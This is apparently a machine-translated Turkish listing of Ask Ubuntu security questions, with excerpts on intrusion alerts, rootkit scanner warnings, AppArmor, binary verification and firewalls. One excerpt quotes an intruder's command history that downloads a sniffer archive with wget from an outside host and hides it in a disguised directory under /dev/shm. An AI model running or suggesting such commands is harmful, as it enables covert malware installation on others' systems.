«security» etiketlenmiş sorular

Uzun zamandır Linux kullanıyorum ve her zaman tarama, başarısız oturum açma girişimi vb. Gibi şüpheli ağ etkinlikleri hakkında beni e-postayla veya e-posta yoluyla uyaran bir pasif yazılım / komut dosyası kurulumuna ihtiyaç duyduğumu hissediyorum. görsel / sesli bildirimler. Tomruklardan ve eşyalardan nasıl bakılacağını biliyorum, fakat çoğunlukla manuel, zaman alan bir …

27 software-recommendation  security  firewall  logs 

Ubuntu için herhangi bir ücretsiz VPN sağlayıcısı bulunamıyor. Eski sorulara bakmayı denedim ama eski görünüyorlar.

27 security  vpn  privacy 

Geçenlerde bir şık küçük donanım ikinci faktör kimlik doğrulama cihazı - bir Yubikey Neo satın aldı. Öncelikle One Time Parolaları ve yeni ortaya çıkan U2F protokolü ile kullanılması amaçlanmıştır - ancak Yubikey sürüm 2'den bu yana HMAC-SHA1 sorun yanıtı kimlik doğrulamasını da destekler. HMAC-SHA1 bir gizli anahtar (Yubikey'in içinde depolanmış) …

27 password  security  encryption  luks  yubikey 

Şirket politikam, Linux kutularının SELinux ile güvence altına alınması gerektiğini söylüyor (böylece bir güvenlik denetçisi her sunucu için 'evet, fazlasıyla güvendeyiz!' Onay kutusunu işaretleyebilir). Ubuntu'nun müthiş varsayılan AppArmor güvenliğinden faydalanmayı ummuştum. Hem Apparmor hem de SELinux'u çalıştırmak akıllıca değil mi? (Eğer öyleyse, bu kötü fikir bazı belirsiz ve / veya …

27 security  permissions  apparmor 

Kişisel bilgisayarımdaki sistemime sızıldığından% 99,9 eminim. İlk önce nedenimi açıklamama izin verin ki durum netleşsin: Şüpheli etkinlik ve sonraki eylemlerin kaba zaman çizelgesi: 4-26 23:00 Tüm programları bitirdim ve dizüstü bilgisayarımı kapattım. 4-27 12:00 Dizüstü bilgisayarımı yaklaşık 13 saat bekleme modunda kaldıktan sonra açtım. Aşağıdakileri içeren birden fazla pencere açıktı: …

25 ssh  security  passwd-file 

Chkrootkit tarafından tarama "tcpd" yi ENFEKTİF olarak gösteriyor. Her ne kadar rkhunter tarafından yapılan bir tarama tamam gibi görünse de (düzenli yanlış pozitifler hariç) Endişeleneyim mi? (4.8.0-37-generic ile Ubuntu 16.10’dayım)

25 security  malware  rootkit  tcpdump  chkrootkit 

Sudo şifresinin bilgisayarımı fiziksel olarak erişimi olan biri tarafından yerel olarak saldırıya uğramaya karşı koruduğunu biliyorum ( düzenleme: aslında, değil ). Şifrem bu amaç için yeterince güçlü, ancak birisinin uzaktan zorla uygulayabilmesi için yeterince güçlü olmadığını biliyorum. Can herkes erişim standart bir Ubuntu masaüstü yüklemesinde bilgisayara fiziksel erişimi olan benim …

25 password  sudo  security 

Kullanıcıların% 99 gibi, ben de hazır ikili dosyalardan Ubuntu yükledim. Bu ikili dosyaların gerçekte Ubuntu’nun orijinal kaynak kodundan olduğunu nasıl doğrulayabilirim? NSA'nın / birinin, ikili dosyalar ile uğraşmak için Ubuntu veya Linode (VPS sağlayıcım) ile işbirliği yapmadığını doğrulamak iyi olurdu. İkili dosyaları doğrulayabilseydik, ilk başta denemeleri pek mümkün olmayacaktı, çünkü …

25 security 

Ubuntu önceden kurulmuş veya otomatik bir güvenlik duvarıyla birlikte geliyor mu? Eğer değilse, birine ihtiyacım var mı? Linux'un güvenlikle ilgili diğer işletim sistemlerine göre avantajları hakkında bazı makaleler okudum (antivirüs kullanmaya gerek yok ...) ama emin olmak istiyorum.

25 security  firewall 

Ubuntu 10.04.1 LTS kullanıyorum. Ben koşuyorum rkhunter rootkit kontrol etmek. rkhunter, aşağıdaki gizli dosya ve dizinlerden şikayetçi. Bu dosyaların sistemimde gerçek bir sorun olmadığını düşünüyorum, ancak bu dosyaların meşru dosyalar olup olmadığını nasıl kontrol edebilirim? [07:57:45] Checking for hidden files and directories [ Warning ] [07:57:45] Warning: Hidden directory found: …

25 10.04  security  rkhunter 

Dün VServer'imdeki komut geçmişimi kontrol ettim. Birkaç şüpheli hat buldum. 195 wget aridan.hol.es/sniffer.tgz 196 tar xvf sniffer.tgz 197 ls -a 198 rm -rf sniffer.tgz 199 rm -rf .sniff/ 200 cd /dev/shm 201 ls -a 202 mkdir " . " 203 ls -a 204 cd " . "/ 205 wget aridan.hol.es/sniffer.tgz …

24 ssh  security  malware 

do-release-upgradeİşlemi yani Ubuntu'nun bir sonraki ilkbahar veya sonbaharda Ubuntu sürümüne geçmemi istememi istediğimi anlamaya çalışıyorum . İçin kaynaklar okuduktan sonra ubuntu-release-upgraderI bulundu / etc / update-manager / meta-salım sistemimde dosyayı. Bu dosya, http://changelogs.ubuntu.com/meta-release’e işaret etmek için Warty 04.10’dan Raring 13.04’e kadar çeşitli Ubuntu’ların yayınlandığı listelenen bir HTTP URL’si kullanır . …

24 security  do-release-upgrade 

Cevapta sorulmasını istediğim bazı sorular: Apparmor'un çalışıp çalışmadığını nasıl bilebilirim? İyi çalıştığını nasıl anlarım?

24 security  apparmor 

Herhangi bir kötü amaçlı yazılım Linux sistemine girerse, en çok kullanıcı düzeyinde bir ayrıcalık kazanacak ve belirli bir kullanıcının erişebileceği herhangi bir şeyi, yani kullanıcının kendi dosyalarını mahvedeceğini anlıyorum. Ancak, kötü amaçlı yazılımların kök düzeyinde erişim kazanmasını engelleyen şey nedir? Bir şekilde şifreyi içeriden kıramaz mı?

24 security 

RedHat / CentOS sisteminde, rpm -V kullanarak sistemime yüklenen RPM'leri doğrulayabilirim . Ubuntu veya aptbu komutun karşılığı nedir ?

24 security  apt  rpm  deb